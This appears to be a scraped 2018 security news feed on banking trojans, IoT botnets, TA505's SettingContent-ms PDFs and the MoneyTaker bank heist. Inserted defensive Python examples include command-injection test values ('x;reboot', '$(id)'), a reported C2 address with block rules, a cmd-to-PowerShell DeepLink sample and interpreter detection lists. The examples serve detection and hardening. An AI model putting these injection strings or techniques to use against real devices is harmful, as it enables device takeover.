A third campaign was observed from July 15; victims received fake invoice emails carrying weaponized documents that attempted to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.

The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.

The fourth campaign started on July 20 and according to the experts it is still ongoing.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.

“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,”

Pierluigi Paganini

(Security Affairs – Kronos, banking)

The post Kronos Banking Trojan resurrection, new campaigns spotted in the wild appeared first on Security Affairs.

New variant of Kronos banking trojan spotted using Tor network

By Waqas

WannaCry ransomware hero is facing charges in the United States for developing Kronos banking trojan. In August 2017, Marcus Hutchins (@MalwareTechBlog on Twitter) aka WannaCry ransomware hero was arrested in the United States by the FBI and charged with playing a vital role in the development of Kronos banking Trojan. He is still in the States facing Federal […]

This is a post from HackRead.com Read the original post: New variant of Kronos banking trojan spotted using Tor network

How Blockchain Ecosystems Can Be a Threat to Cybersecurity

The first impression of many people about blockchain technology is that it will actually enhance cybersecurity. The reason for this point of view is because of the structure of blockchain

The post How Blockchain Ecosystems Can Be a Threat to Cybersecurity appeared first on The Cyber Security Place.

The Death botnet grows targeting AVTech devices with a 2-years old exploit

A new botnet, tracked as the Death botnet, has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.

A new botnet, tracked as the ‘Death botnet,’ has appeared in the threat landscape; its author, who goes online by the moniker EliteLands, is gathering unpatched AVTech devices into the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers and the largest publicly listed company in the Taiwan surveillance industry.

EliteLands is using a two-year-old exploit that could be used to trigger several well-known vulnerabilities in the AVTech firmware. Many of the vendor’s products currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav, who discovered the Death botnet, revealed that outdated firmware versions expose the passwords of AVTech devices in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection in the password field: an attacker can supply a shell command in this field and have it executed, taking over the device.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”
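The bug class Anubhav describes, a login field concatenated into a shell command line, is worth seeing next to its fix and next to the log check a defender would run. The following is an added example, not AVTech firmware code and not the botnet’s payload: a Python sketch of the vulnerable pattern, what a POSIX shell actually executes when the field contains a separator, the argv-based fix, and a scan of access-log lines for injection attempts in the password parameter. The helper binary path, the CGI endpoint, the parameter names and the log lines are all assumptions constructed for the demonstration.

```python
import re
import shlex
from typing import List
from urllib.parse import parse_qs, urlsplit

CHECK_BIN = "/usr/sbin/check_user"   # hypothetical firmware helper; stands in for whatever the CGI shells out to


def build_login_cmd_vulnerable(user: str, password: str) -> str:
    """The anti-pattern the article describes: request fields pasted straight into a shell command line."""
    return f"{CHECK_BIN} {user} {password}"


def shell_would_run(cmdline: str) -> List[List[str]]:
    """Tokenise the way a POSIX shell would and split on command separators,
    so the reader can see how many commands the string really is."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok and all(c in ";&|" for c in tok):      # ';', '&&', '||', '|', '&'
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def build_login_cmd_hardened(user: str, password: str) -> List[str]:
    """Fix: hand the fields to the helper as separate argv entries and never go through a shell.
    subprocess.run(argv) with a list never interprets ';', '|' or '$(...)', so they stay plain data."""
    if not (0 < len(user) <= 64 and 0 < len(password) <= 64):
        raise ValueError("field length out of range")
    return [CHECK_BIN, user, password]


# Detection side: requests whose password parameter carries shell metacharacters.
_SHELL_META = re.compile(r"[;&|`$\n]")
PASSWORD_PARAMS = ("pwd", "password")   # assumption; check the parameter names your firmware's CGI actually uses


def looks_like_injection(value: str) -> bool:
    return bool(_SHELL_META.search(value))


def flag_requests(log_lines) -> List[str]:
    """Return the access-log lines whose login query string looks like a command-injection attempt."""
    flagged = []
    for line in log_lines:
        try:
            request_target = line.split('"')[1].split(" ")[1]   # the path+query of the request line
        except IndexError:
            continue
        params = parse_qs(urlsplit(request_target).query)
        values = [v for key in PASSWORD_PARAMS for v in params.get(key, [])]
        if any(looks_like_injection(v) for v in values):
            flagged.append(line)
    return flagged


# Constructed access-log lines (endpoint name and addresses are invented); '%3B' and '%24' are ';' and '$' URL-encoded.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [25/Jul/2018:10:01:02 +0000] "GET /cgi-bin/login.cgi?user=admin&pwd=admin HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Jul/2018:10:01:09 +0000] "GET /cgi-bin/login.cgi?user=admin&pwd=x%3Breboot HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Jul/2018:10:01:15 +0000] "GET /cgi-bin/login.cgi?user=admin&pwd=%24(id) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(shell_would_run(build_login_cmd_vulnerable("admin", "x;reboot")))
    print(build_login_cmd_hardened("admin", "x;reboot"))
    for line in flag_requests(SAMPLE_ACCESS_LOG):
        print("SUSPECT:", line)
```

The point of shell_would_run is the second list it returns: the password “x;reboot” becomes a separate command, which is exactly the behaviour Anubhav describes. The hardened version does not try to filter metacharacters out of a password (legitimate passwords contain them); it removes the shell from the path entirely, which is the only fix that holds. The log check is a triage aid, not a control: an attacker who already has the firmware can encode the payload in ways this regex will not catch, so treat a hit as a prompt to check the device’s user list.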

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices still run old firmware. Recently, another botnet, Hide ‘N Seek (HNS), started leveraging the same issue (listed as “(new) AVTECH RCE”) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands is gathering devices for his Death botnet by hitting exposed devices with different payloads in the password field.

The latest version of the payload used by EliteLands adds accounts with a lifespan of five minutes; each account executes his payload and is then deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted EliteLands, who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was originally just to DDoS but I have a greater plan on it soon. I don’t really use it for attacks, only to get customers aware of the power it has.”

Stay tuned.

Pierluigi Paganini

(Security Affairs – Death botnet,  hacking)

The post The Death botnet grows targeting AVTech devices with a 2-years old exploit appeared first on Security Affairs.


Cryptomining Replaces Ransomware as Most Popular Cybercrime Malware

Skybox® Security, a global leader in cybersecurity management, announced today the release of its mid-year update to the Vulnerability and Threat Trends Report which analyzes vulnerabilities, exploits and threats in play. The report,

The post Cryptomining Replaces Ransomware as Most Popular Cybercrime Malware appeared first on The Cyber Security Place.

Experts warn of new campaigns leveraging Mirai and Gafgyt variants

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.

Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online, many variants have emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the latest variants to have appeared online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014, and its source code was leaked in early 2015.

In September 2016, joint research conducted by Level 3 Communications and Flashpoint identified a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by Palo Alto Networks.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include code to target the D-Link DSL-2750B OS command injection flaw; experts noticed that the new feature was implemented only a few weeks after the publication, on May 25, of the Metasploit module that exploits it.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot, one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits, such as code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-10562) in Dasan GPON routers, a flaw in Huawei routers tracked as CVE-2017-17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, and a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by Palo Alto Networks.

The campaign leverages two different encryption schemes; the bot propagates only via exploits, and it prevents further infection of compromised devices by dropping packets received on certain ports using iptables.

The latest Mirai variant uses the IP address 213[.]183.53.120 both for serving payloads and as a command and control (C2) server; the same address was also used by some Gafgyt samples.
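Reports publish network indicators defanged (213[.]183.53.120 rather than the bare address) so that a copy-paste does not become a click; before they can be matched against logs they have to be refanged, validated and compared as whole addresses, not substrings. The following is an added example, not Palo Alto Networks’ tooling: it refangs the address the report names, scans constructed firewall connection lines for it, and emits the iptables rules a gateway would use to cut infected devices off from it. The log lines, internal addresses and timestamps are constructed.

```python
import ipaddress
import re
from typing import Iterable, List, Set, Tuple


def refang(ioc: str) -> str:
    """Undo the defanging conventions reports use (213[.]183.53.120, hxxp://, [dot]) so the value can be matched."""
    s = ioc.strip()
    for defanged, clean in (("[.]", "."), ("(.)", "."), ("{.}", "."), ("[dot]", "."), ("(dot)", "."),
                            ("hxxp://", "http://"), ("hxxps://", "https://"), ("[:]", ":"), ("[@]", "@")):
        s = s.replace(defanged, clean)
    return s


# The address the report names as both payload host and C2, kept defanged here exactly as published.
REPORTED_IOCS = ["213[.]183.53.120"]


def load_iocs(raw: Iterable[str]) -> Set[str]:
    """Refang and validate; a typo in an IoC list should fail loudly, not silently never match."""
    out: Set[str] = set()
    for item in raw:
        ip = refang(item)
        ipaddress.ip_address(ip)  # raises ValueError on anything that is not an address
        out.add(ip)
    return out


# Dotted quads only where not glued to more digits or dots, so 213.183.53.12 is not read out of 213.183.53.120.
_IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def extract_ipv4(text: str) -> List[str]:
    """Pull syntactically valid IPv4 addresses out of a log line (rejects 300.1.2.3 and the like)."""
    found = []
    for cand in _IPV4.findall(text):
        try:
            ipaddress.IPv4Address(cand)
        except ValueError:
            continue
        found.append(cand)
    return found


def match_lines(lines: Iterable[str], iocs: Set[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, matched_ip, line) for every line that talks to a listed address."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in extract_ipv4(line):
            if ip in iocs:
                hits.append((n, ip, line))
    return hits


def block_rules(iocs: Set[str]) -> List[str]:
    """iptables rules for a gateway: drop locally originated and forwarded traffic to the listed hosts."""
    rules = []
    for ip in sorted(iocs):
        rules.append(f"iptables -I OUTPUT -d {ip} -j DROP")
        rules.append(f"iptables -I FORWARD -d {ip} -j DROP")
    return rules


# Constructed firewall connection log; internal addresses and timestamps are made up.
SAMPLE_LOG = [
    "2018-07-24T10:14:03Z fw conn src=10.0.0.23 dst=213.183.53.120 dport=80 proto=tcp action=allow",
    "2018-07-24T10:14:05Z fw conn src=10.0.0.23 dst=93.184.216.34 dport=443 proto=tcp action=allow",
    "2018-07-24T10:15:41Z fw conn src=10.0.0.41 dst=213.183.53.120 dport=80 proto=tcp action=allow",
    "2018-07-24T10:16:02Z fw conn src=10.0.0.41 dst=213.183.53.12 dport=80 proto=tcp action=allow",
]

if __name__ == "__main__":
    iocs = load_iocs(REPORTED_IOCS)
    for n, ip, line in match_lines(SAMPLE_LOG, iocs):
        print(f"line {n}: {ip} <- {line}")
    print("\n".join(block_rules(iocs)))
```

The source addresses in the hits are the devices to pull and reflash; a device that keeps reaching the payload host after a reboot has not been cleaned. Blocking the address at the gateway stops the download and the C2 channel, but not the inbound exploitation that put the bot there in the first place: the D-Link, GPON and Huawei services the variant targets still need to be off the internet or patched.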

A second campaign observed by the researchers used the same exploits as the previous one but also attempted credential brute-force attacks.

The campaign was tracked as Okane, after the name of the binaries downloaded by its propagation shell script.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis. 

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”

(Figure: the unusual entries from the Okane brute-force lists, shown as an image in the original post.)

Experts at Palo Alto Networks observed a third campaign, tracked as Hakai, that attempted to infect devices with the Gafgyt malware using all of the previous exploits except the UPnP SOAP TelnetD command execution exploit.

Further details about the campaigns, including IoCs, are included in the post published by Palo Alto Networks.

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Experts warn of new campaigns leveraging Mirai and Gafgyt variants appeared first on Security Affairs.

Uber driver recorded passengers & live-streamed videos on Twitch

By Carolina

What is shocking about this incident is that what the Uber driver did was legal under Missouri law. Jason Gargac, an Uber and Lyft driver from St Louis Missouri, USA recorded and live-streamed his passengers’ activities on the video-sharing website Twitch, without their consent and knowledge. The videos displayed activities of passengers in the vehicle including personal conversations […]

This is a post from HackRead.com Read the original post: Uber driver recorded passengers & live-streamed videos on Twitch

The source code of the Exobot Android banking trojan has been leaked online

The source code of the Exobot Android banking trojan has been leaked online; researchers have already verified its authenticity.

The source code of the Exobot Android banking trojan has been leaked online, and experts believe that we will soon see a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016, when its authors were advertising it on the dark web.

The authors advertised it as usable for phishing attacks; it implements the features most common in banking Trojans, such as intercepting SMS messages.

Exobot is a powerful banking malware that is able to infect even smartphones running the latest Android versions.

In January, the authors decided to stop working on the malware and offered its source code for sale.

Now researchers from Bleeping Computer have confirmed receiving a copy of the source code from an unknown individual, and shared it with malware researchers from ESET and ThreatFabric to verify its authenticity.

“The code proved to be version 2.5 of the Exobot banking trojan, also known as the “Trump Edition,” one of Exobot’s last version before its original author gave up on its development.” reads a blog post published by Bleeping Computer.

According to experts from ThreatFabric, the version provided to Bleeping Computer was leaked online in May. It seems that one of the users who purchased the malicious code decided to leak it.

According to the experts, the source code of the Exobot Android banking Trojan is now being distributed on a few underground hacking forums, which means that threat actors can now work on their own versions and also offer them under a malware-as-a-service model.

“In the coming months, we may see Android malware devs slowly migrating their campaigns from BankBot to Exobot, as few will decline a “free upgrade” to a better code.” concluded Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Android,  banking Trojan)

The post The source code of the Exobot Android banking trojan has been leaked online appeared first on Security Affairs.

TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT

Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Security experts from Proofpoint have uncovered a massive malspam campaign in which crooks sent hundreds of thousands of emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Experts attributed the malspam campaign to the cybercriminal group tracked as TA505; the attackers are spreading the FlawedAmmyy RAT.

The SettingContent-ms file format was introduced in Windows 10 to allow a user to create “shortcuts” to various Windows 10 settings pages.

The file is plain XML and, in its legitimate form, opens the Control Panel for the user (control.exe); experts noticed that it includes a <DeepLink> element in its schema.

This element takes any binary with parameters and executes it, which means that an attacker can replace ‘control.exe’ with anything that runs a command, including cmd.exe and PowerShell, without user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from SpecterOps.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that a malicious SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.

In June, experts from SpecterOps monitored several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but Proofpoint later observed threat actors leveraging PDF documents as the carrier.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”

SettingContent-ms files campaign


Once the victim opens the PDF file, Adobe Reader displays a warning asking whether they want to open the file, because the document is attempting to run the embedded “downl.SettingContent-ms” via JavaScript. Experts noted that this warning is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.

If the victim clicks “OK” at the prompt, the PowerShell command included in the <DeepLink> element downloads and executes the FlawedAmmyy RAT.
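A defender-side triage check for the <DeepLink> element described above, added here as an example; it is not code from the original post, SpecterOps or Proofpoint. It assumes only that a .SettingContent-ms file is XML containing a <DeepLink> element; the surrounding element names in the two constructed samples are an approximation of the real schema, and the interpreter list is a constructed starting point:

```python
"""Static triage of .SettingContent-ms files by inspecting the <DeepLink> element.

Added example for this post, not code from Security Affairs, SpecterOps or Proofpoint.
Assumptions: the file is XML with a <DeepLink> element somewhere in the tree; the
element names around it in the samples below are a constructed approximation of
the real schema; a benign settings shortcut points at a Windows settings binary such
as control.exe and carries no shell interpreter or arguments.
"""
import xml.etree.ElementTree as ET

# Constructed sample: a benign shortcut whose DeepLink launches control.exe.
BENIGN_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\\system32\\control.exe</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

# Constructed sample of the abuse described above: DeepLink chains cmd.exe into
# PowerShell. The argument is an inert placeholder, not a real payload.
SUSPICIOUS_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>C:\\Windows\\System32\\cmd.exe /c powershell.exe -Command PLACEHOLDER</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

# Binaries that have no business inside a settings shortcut (constructed list; extend it).
INTERPRETERS = ("cmd.exe", "powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
EXPECTED_TARGET = "control.exe"


def extract_deeplinks(xml_text):
    """Return the text of every <DeepLink> element, regardless of XML namespace."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    links = []
    for elem in root.iter():
        # With a default xmlns the tag reads "{namespace}DeepLink"; compare the local name only.
        if elem.tag.rsplit("}", 1)[-1] == "DeepLink" and elem.text:
            links.append(elem.text.strip())
    return links


def classify_deeplink(link):
    """Return (verdict, reasons) for one DeepLink value."""
    lowered = link.lower()
    reasons = []
    # First whitespace-delimited token is the executable, the rest are arguments.
    # (Good enough for triage; paths containing spaces would need proper quoting rules.)
    tokens = link.split()
    target = tokens[0].lower() if tokens else ""
    args = " ".join(tokens[1:])
    if not target.endswith(EXPECTED_TARGET):
        reasons.append(f"target is not {EXPECTED_TARGET}: {tokens[0] if tokens else '<empty>'}")
    for name in INTERPRETERS:
        if name in lowered:
            reasons.append(f"references interpreter {name}")
            break
    if args:
        reasons.append(f"carries arguments: {args}")
    if "://" in lowered:
        reasons.append("contains a URL")
    return ("suspicious" if reasons else "benign"), reasons


def triage_file(xml_text):
    """Classify every DeepLink in a file; a file with no DeepLink at all is also odd."""
    links = extract_deeplinks(xml_text)
    if not links:
        return [("<none>", "suspicious", ["no DeepLink element found"])]
    return [(link, *classify_deeplink(link)) for link in links]


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        for link, verdict, reasons in triage_file(sample):
            print(f"[{label}] {verdict}: {link}")
            for r in reasons:
                print("    -", r)
```

Run it over quarantined attachments or over files carved out of PDF and Office containers; it complements, rather than replaces, the mail-gateway and ASR controls the post mentions, because the value of the check is that it needs no execution of the file at all.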

The FlawedAmmyy RAT has been active since 2016; it borrows code from the Ammyy Admin remote access Trojan.

FlawedAmmyy implements common backdoor features: it allows attackers to manage files, capture the screen, remotely control the machine, establish RDP sessions, and much more.

Experts attributed the malspam campaign to the TA505 threat actor based on the email messages as well as the payload.

TA505 operates on a large scale; it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” conclude Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”

Pierluigi Paganini

(Security Affairs – TA505 ,  SettingContent-ms file)

The post TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT appeared first on Security Affairs.

Hackers attack Russian bank to steal $1m using an outdated router

By Waqas

Cybercriminals part of a notorious hacking group attacked the PIR Bank of Russia and stole $1m. The hacking was carried out after infiltrating the bank’s systems by compromising an old, outdated router. The router was installed at one of the regional branches of the bank. The money was stolen via the Automated Workstation Client (AWC) […]

This is a post from HackRead.com. Read the original post: Hackers attack Russian bank to steal $1m using an outdated router

MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank

The cybersecurity firm Group-IB is handling incident response for an attack on the Russian PIR Bank conducted by the MoneyTaker hacking group.

The MoneyTaker hacker group stole 1 million US dollars from the Russian bank; the cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar to SWIFT).

The crooks transferred the money to 17 accounts at major Russian banks and cashed it out, then tried to ensure persistence in the bank’s network for later attacks. The bank hired Group-IB to respond to the incident and limit the damage.

According to the Kommersant newspaper, the MoneyTaker hacking group stole around $920,000 (a conservative estimate) from the Russian bank. PIR Bank officially confirmed the attack but was unable to determine the exact amount of money stolen by the attackers.

Although the bank managed to delay the withdrawal of the stolen funds, most of them are lost.

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible. At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents,” said Olga Kolosova, Chairperson of the Management Board of PIR Bank LLC.

Forensic analysis of workstations and servers at the bank revealed that the attack was launched by the MoneyTaker hacker group. The hackers used specific tools and techniques that MoneyTaker had used earlier in previous attacks on financial institutions. The experts also noticed that the IP addresses of their C&C servers were the same as those used in previous attacks.

MoneyTaker is a cybercrime gang specialized in targeted attacks on financial institutions; in December 2017 Group-IB published a detailed report on its activity (MoneyTaker: 1.5 Years of Silent Operations). The group focuses on card processing and interbank transfer systems (AWS CBR and SWIFT).

MoneyTaker hacker group

The MoneyTaker group has been active at least since spring 2016, when it stole money from a U.S. bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers went dark for almost four months and then attacked only banks in Russia, in September 2016.

Group-IB recorded 10 MoneyTaker attacks against organizations in the U.S., UK, and Russia. Since 2017, the group restricted the geography of the attacks to Russia and the U.S.

In 2018, Group-IB tracked two MoneyTaker attacks in Russia. 

“MoneyTaker has its own set of specific TTPs. The hackers try to go unnoticed, use ‘one-time’ infrastructure, ‘fileless’ software and carefully cover up traces of their presence. This involves specific usages of Metasploit and PowerShell Empire frameworks.” states Group-IB.

Back to the PIR Bank attack: Group-IB confirmed that it started in late May 2018. The hackers gained access to the bank by compromising a router used by one of the bank’s regional branches.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.” reads the press release published by Group-IB.

The MoneyTaker group uses PowerShell scripts to establish persistence in the banks’ systems and to automate some stages of its attacks. Once the crooks had penetrated the bank’s main network, they gained access to AWS CBR (Automated Work Station Client of the Russian Central Bank) to generate payment orders and send money in several tranches to mule accounts prepared in advance.

On the evening of July 4, bank IT staff discovered the unauthorized transactions involving large sums and quickly asked the regulator to block the AWS CBR digital signature keys, but it was not possible to stop the financial transfers in time.

Most of the stolen money was transferred to cards of the 17 largest banks on the same day and immediately cashed out by money mules involved in the final stage of money withdrawal from ATMs.

MoneyTaker hackers cleared OS logs on many computers, which was meant to hinder the response to the incident and its subsequent investigation, a technique already observed in other attacks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response this was detected by Group-IB employees and removed by the bank’s sysadmins.” added Group-IB.

“This is not the first successful attack on a Russian bank with money withdrawal since early 2018,” says Valeriy Baulin, Head of the Digital Forensics Lab at Group-IB. “We know of at least three similar incidents, but we cannot disclose any details before our investigations are completed. As for withdrawal schemes, each group specializing in targeted attacks – Cobalt, Silence and MoneyTaker (these have been the most active groups in 2018) – has its own scheme depending on the amounts and cashout scenarios. We should understand that attacks on AWS CBR are difficult to implement and are not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully. A 2016 incident, when MoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind.”

Pierluigi Paganini

(Security Affairs – MoneyTaker hacking group, cybercrime)

The post MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank appeared first on Security Affairs.

Security Affairs: How crooks conduct Money Laundering operations through mobile games

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.

A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice; the investigation started in mid-June, when experts from Kromtech Security discovered a MongoDB database exposed online. The database contained information related to carders’ activities, including 150,833 unique card records (card number, expiration date, and CVV).

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is as simple as it is effective. Crooks used a special tool to create iOS accounts using valid email accounts, then associated the stolen payment cards with those accounts. Most of the created accounts belong to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then jailbroke iOS devices to install various games, created in-game accounts, and used them to purchase game features or premiums.

The cash-out came later, when the crooks re-sold the game features or premiums online for real money.

Experts found that the credit cards belonged to 19 different banks and speculated that they were probably bought on carder markets, where they are offered in batches of 10k, 20k, or 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a gaming community of over 250 million users and generate approximately $330 million USD a year in revenue. Associated third-party markets are very active: websites like g2g.com allow gamers to buy and sell resources and games, a great opportunity for crooks involved in money laundering.

money laundering games

“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

App | Offered by | Android users | Release | Metacritic score | In-app products (price per item) | Daily revenue ($) | Yearly revenue ($)
Clash of Clans | Supercell | 100,000,000+ | 2012 | 74/100 | $0.99 – $99.99 | 684,002 | 250M
Clash Royale | Supercell | 100,000,000+ | 2016 | 86/100 | $0.99 – $99.99 | 153,150 | 56M
Marvel Contest of Champions | Kabam | 50,000,000+ | 2014 | 76/100 | $0.99 – $99.99 | 64,296 | 23.5M

The experts also found that Apple employed a lax credit card verification process when users add payment card data to iOS accounts, which facilitates fraudulent activity. The experts noticed that cards with improper names and addresses were approved by Apple, so they reported their findings to Apple.

The experts also highlighted that game makers do not implement the measures necessary to prevent this kind of abuse. For example, game makers do not police tools like Raccoonbot, which interact with Supercell games to automate the buying of premium features.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans. It advertises itself in its forum as a way to “Become rich at Clash of the Clans”. This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards. It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

iGameSupply is an approved marketplace for selling Raccoonbot-generated gems: https://www.raccoonbot.com/forum/forum/80-approved-marketplace/

Pierluigi Paganini

(Security Affairs – gaming, money laundering)

The post How crooks conduct Money Laundering operations through mobile games appeared first on Security Affairs.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

